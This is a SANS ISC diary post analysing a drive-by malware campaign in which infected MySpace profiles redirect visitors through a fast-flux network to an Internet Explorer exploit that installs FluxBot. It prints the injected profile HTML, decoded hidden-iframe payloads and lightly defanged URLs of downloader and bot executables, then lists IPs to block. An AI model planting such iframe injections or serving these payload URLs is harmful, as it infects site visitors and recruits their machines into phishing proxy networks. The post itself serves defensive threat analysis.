Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: MySpace Flux Malware SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms: https://isctv.sans.edu

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
MySpace Flux Malware

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive by exploits.  The exploits will install a version of "flux bot", a very popular proxy network bot.

  FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex ever changing networks of proxy servers. A system infected with FluxBot will be used a one of these proxies.

  Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

  A typical excerpt from an infected profile (obfuscated to protect the innocent): 

 

<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.dusanbut.com/login.php"><img
style="border-width:0px;width:1280px;height:220px;"
src="http://x.myspace.com/images/clear.gif"></a></style>



   The actual exploit / malware is served via an existing flux network. *.dusanbut.com will redirect the user to an encoded javascript which decodes to:

<script>window.status="Done"</script>
    <iframe src="http://fafb4c4c .com/header_03.gif" width=1
height=1></iframe>
   The domain used here is of course again served via flux. header_03.gif

 

<script>window.status="Done"</script>
    <iframe src="http://fafb4c4c .com/routine.php" width=1
height=1></iframe>


   Are we there yet? yup. just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:

http://fafb4c4c .com/session.exe (this is just the downloader stub)

The downloader will now retrieve the actual bot. We have seen among others these
URLs:

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe


Settings for the bot can be found here:

http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe

once its all set and done, you will be a proud new member of the flux net and soon you
will find your system to participate in phishing and similar endevours.

Couple IPs that may be worthwhile to block:

AS13767   | 72.232.254.218 
AS15083   | 65.111.176.176
AS25761   | 72.20.18.86    
AS25761   | 72.20.6.10   

As you can imagine, its a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.

 

 

 

I will be teaching next: Defending Web Applications Security Essentials - SANS San Francisco Winter 2019

Johannes

3674 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!